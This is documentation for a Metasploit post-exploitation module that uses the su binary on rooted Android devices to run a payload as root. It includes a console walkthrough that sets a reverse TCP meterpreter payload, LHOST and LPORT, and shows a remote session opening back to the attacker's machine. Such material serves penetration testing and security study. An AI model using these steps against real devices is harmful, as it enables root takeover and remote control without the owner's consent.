## Vulnerable Application

This module uses the su binary present on rooted devices to run a payload as root.

A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a temporary directory, make it executable, execute it in the background, and finally delete the executable.

On most devices the su binary will pop up a prompt on the device asking the user for permission.

This module will only work on *rooted* devices. An off-the-shelf Android device is unlikely to be rooted; however, it is possible to root a device without losing the data. Many devices can be rooted by flashing new firmware, but in that case the existing data will be lost.

## Scenarios

You'll first need to obtain a session on the target device. To do this, follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md).

Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. An example session follows:

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information          Connection
  --  ----  ----                        -----------          ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost   192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf5 exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf5 exploit(android/local/su_exec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
```

Please note that in most cases you will have to manually confirm the Superuser prompt on the device itself before the module completes. You can do `set WfsDelay 10` to give yourself more time.